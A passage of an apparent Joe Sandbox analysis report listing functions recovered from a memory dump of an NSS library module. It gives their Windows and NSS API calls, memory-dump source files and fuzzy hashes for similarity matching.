                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18821
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF1883D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: EnterCriticalSection.KERNEL32(?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18856
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BF18887
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_Unlock.NSS3(?,?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18899
                                                                                                                                                                                                                                                            • PR_SetError.NSS3 ref: 6BF14A10
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6BF0781D,?,6BEFBD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF14A24
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,6BEFBD28,00CD52E8), ref: 6BF14A39
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,6BEFBD28,00CD52E8), ref: 6BF14A4E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3904631464-0
                                                                                                                                                                                                                                                            • Opcode ID: 6a449ac98677588127aad0df4f0579a2d772ad9ed6df0b8aaa018afa14d8886b
                                                                                                                                                                                                                                                            • Instruction ID: 06da3e5744e30473fb824be0de361d097c577494fee310fa89bb62da656bf65c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a449ac98677588127aad0df4f0579a2d772ad9ed6df0b8aaa018afa14d8886b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21212CB6A086018FDB00AFB9C18952AB7F4FF85768F114D69DC858B711EB38E840CF91
                                                                                                                                                                                                                                                            Function 6BF4D940 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000,?,?,6BF4DEBF,00000000), ref: 6BF4D957
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: TlsGetValue.KERNEL32(00000000,?,6BEE00D2,00000000), ref: 6BEC95D2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: EnterCriticalSection.KERNEL32(?,?,?,6BEE00D2,00000000), ref: 6BEC95E7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: PR_Unlock.NSS3(?,?,?,?,6BEE00D2,00000000), ref: 6BEC9605
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000,?,?,6BF4DEBF,00000000), ref: 6BF4D96B
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6BF4DEBF,00000000), ref: 6BF4D9A1
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6BF4DEBF,00000000), ref: 6BF4D9B5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Item_Zfree$Arena_CertificateCriticalDestroyEnterFreeSectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1823385167-0
                                                                                                                                                                                                                                                            • Opcode ID: 0b36c6137c28c8686b5fefad1a533d5296f8becf3db5bb60d2660111422f52ff
                                                                                                                                                                                                                                                            • Instruction ID: 37284cc933295f5865760815bc81243ec0bc1ea03373f62a905fe4c8af9c4888
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b36c6137c28c8686b5fefad1a533d5296f8becf3db5bb60d2660111422f52ff
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811E1B7A4070197EB209E71EC06B5777E86B00748F040979E44AD76A2F739F914C7A1
                                                                                                                                                                                                                                                            Function 6BF51AF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6C022F88,6BF50660), ref: 6BF51B08
                                                                                                                                                                                                                                                              • Part of subcall function 6BE44C70: TlsGetValue.KERNEL32(?,?,?,6BE43921,6C0214E4,6BF8CC70), ref: 6BE44C97
                                                                                                                                                                                                                                                              • Part of subcall function 6BE44C70: EnterCriticalSection.KERNEL32(?,?,?,?,6BE43921,6C0214E4,6BF8CC70), ref: 6BE44CB0
                                                                                                                                                                                                                                                              • Part of subcall function 6BE44C70: PR_Unlock.NSS3(?,?,?,?,?,6BE43921,6C0214E4,6BF8CC70), ref: 6BE44CC9
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF51B1C
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BF51B2C
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF51B79
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlockcalloc$CallOnce
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3443561666-0
                                                                                                                                                                                                                                                            • Opcode ID: a153f30de307490ab8682cc8a6e8e34ddb9a11d387a24f8f651b03cebfb6ae68
                                                                                                                                                                                                                                                            • Instruction ID: 6455c650092f384bfa6762ac244f25465256823b1ac5108135faeab035fb29a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a153f30de307490ab8682cc8a6e8e34ddb9a11d387a24f8f651b03cebfb6ae68
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E11E977F10125AFEB105F78D809E1577B8AB66728F144179E44883271FB39E5A48790
                                                                                                                                                                                                                                                            Function 6BEBEAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: htons$CurrentThreadhtonl
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2156189399-0
                                                                                                                                                                                                                                                            • Opcode ID: 82eed0a3587d5bb3a11c7cd515e296160caccb69126820609949f54286c86e7b
                                                                                                                                                                                                                                                            • Instruction ID: e9da0bd15b9a234c0223adfe2680f7f8a693e461509c002166d3a4b784358337
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82eed0a3587d5bb3a11c7cd515e296160caccb69126820609949f54286c86e7b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9111B271D34B9297D7208F34CA8167673B4BF95718B21AF4EE8CA47621E778A1D0C314
                                                                                                                                                                                                                                                            Function 6BF898D0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000084,6BEB0936,00000001,?,6BEB102C), ref: 6BF898E5
                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6BF89946
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BE416B7,00000000), ref: 6BF8994E
                                                                                                                                                                                                                                                              • Part of subcall function 6BE41630: TlsGetValue.KERNEL32(00000000,?,6BEB0936,00000000,?,6BE4204A), ref: 6BE41659
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF8995E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CountCriticalErrorInitializeLastSectionSpinValuecallocfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1588565019-0
                                                                                                                                                                                                                                                            • Opcode ID: 38619dc221d69dcda3c6e8c3d7a360c377c4794501976751c78bbaade59987e9
                                                                                                                                                                                                                                                            • Instruction ID: 8ef414395d4e9bce2cd3c7fbafb6766fd46e519816b6df1200e06e97941b2655
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38619dc221d69dcda3c6e8c3d7a360c377c4794501976751c78bbaade59987e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001AD727406019BD721AFA89C0AB1BBBF8AB06B15F00943EE14AD2942DF78E004CBD1
                                                                                                                                                                                                                                                            Function 6BF52BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BF52A28,00000060,00000001), ref: 6BF52BF0
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: TlsGetValue.KERNEL32(00000000,?,6BEE00D2,00000000), ref: 6BEC95D2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: EnterCriticalSection.KERNEL32(?,?,?,6BEE00D2,00000000), ref: 6BEC95E7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC95B0: PR_Unlock.NSS3(?,?,?,?,6BEE00D2,00000000), ref: 6BEC9605
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BF52A28,00000060,00000001), ref: 6BF52C07
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6BF52A28,00000060,00000001), ref: 6BF52C1E
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,00000000,00000000,?,6BF52A28,00000060,00000001), ref: 6BF52C4A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 358400960-0
                                                                                                                                                                                                                                                            • Opcode ID: 87c99f2425cfd461f4f662df743c80bbc7f81c1d1e98cb120c85bbe58723c4d7
                                                                                                                                                                                                                                                            • Instruction ID: aeb6040057fc11211a8e4c95c56958ed8acca372dc4678f4b33ff3abf212c9e7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87c99f2425cfd461f4f662df743c80bbc7f81c1d1e98cb120c85bbe58723c4d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D0152B6E0070157EB20CF35D905703B7F8AF64658F104A2CE89AD7652F73AF554C691
                                                                                                                                                                                                                                                            Function 6BF188E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,6BF208AA,?), ref: 6BF188F6
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6BF208AA,?), ref: 6BF1890B
                                                                                                                                                                                                                                                            • PR_NotifyCondVar.NSS3(?,?,?,?,?,6BF208AA,?), ref: 6BF18936
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6BF208AA,?), ref: 6BF18940
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CondCriticalEnterNotifySectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 959714679-0
                                                                                                                                                                                                                                                            • Opcode ID: 5e31c67ba4ea665c20b62848e2316e9c1be4a3c727686b2783de3ade4a0b2b43
                                                                                                                                                                                                                                                            • Instruction ID: 95836c8615f6fd45a6ea916e5f95fac78313c0b21fcf7a3bed1347e677f065c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e31c67ba4ea665c20b62848e2316e9c1be4a3c727686b2783de3ade4a0b2b43
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF0192B6A08605DFDB00AF79C285619B7F4FF05798F410A69DC88C7610E738E894CBC2
                                                                                                                                                                                                                                                            Function 6BEC7B00 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6BFE9030), ref: 6BEC7B15
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6BEC1A3E,00000048,00000054), ref: 6BF1FD56
                                                                                                                                                                                                                                                            • SECITEM_ItemsAreEqual_Util.NSS3(?,6BFE9048), ref: 6BEC7B29
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6BEC7B46
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEC7B60
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Equal_Items$CopyErrorItem_memcmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 608361559-0
                                                                                                                                                                                                                                                            • Opcode ID: e1b1180ecede2714b0ae3c9ec70c79f441d57f837238411e7dd9cfb05d547b66
                                                                                                                                                                                                                                                            • Instruction ID: 61a401e074e4970dcfcf48c66204c5fabf85f80283e563ba0f41e670b796753c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1b1180ecede2714b0ae3c9ec70c79f441d57f837238411e7dd9cfb05d547b66
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F0F677A5801632DA5451796C16FBB33288761B5EF604029EF1992351EB29B12640F6
                                                                                                                                                                                                                                                            Function 6BFCF990 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$LockUnlock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 628975992-0
                                                                                                                                                                                                                                                            • Opcode ID: 4ce9c797aa919ac80b5201608e43a5391f11abd46fbd4b7f984a28163335fa95
                                                                                                                                                                                                                                                            • Instruction ID: 8648655add051cc87ebfe03e65759a98f0c2713c565aa7b09cb145104393f10e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ce9c797aa919ac80b5201608e43a5391f11abd46fbd4b7f984a28163335fa95
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 590184723012069BDF049F29DC12556B7F5BB46758724407AD40E8B660DB3BDC01CFD1
                                                                                                                                                                                                                                                            Function 6BFD5AD0 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BFD5ADC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BF0: TlsGetValue.KERNEL32(?,?,?,6BFD0A75), ref: 6BF89C07
                                                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6BFD5AFE
                                                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(?), ref: 6BFD5B09
                                                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6BFD5B12
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$CurrentDestroyLockThreadValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1384236848-0
                                                                                                                                                                                                                                                            • Opcode ID: 49d23f52de86d6e47bc300dbb8872e7fb1c123b60880c68edb7e10c47cae8042
                                                                                                                                                                                                                                                            • Instruction ID: b2645090cf1d9fc2cbdf2ceee62264915811f3a7f8a8c346951c33a0988cfb32
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49d23f52de86d6e47bc300dbb8872e7fb1c123b60880c68edb7e10c47cae8042
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F0E5B3D042129BE7005F38E84394776E8EF01268B04857AE84FC3232EB39E450C699
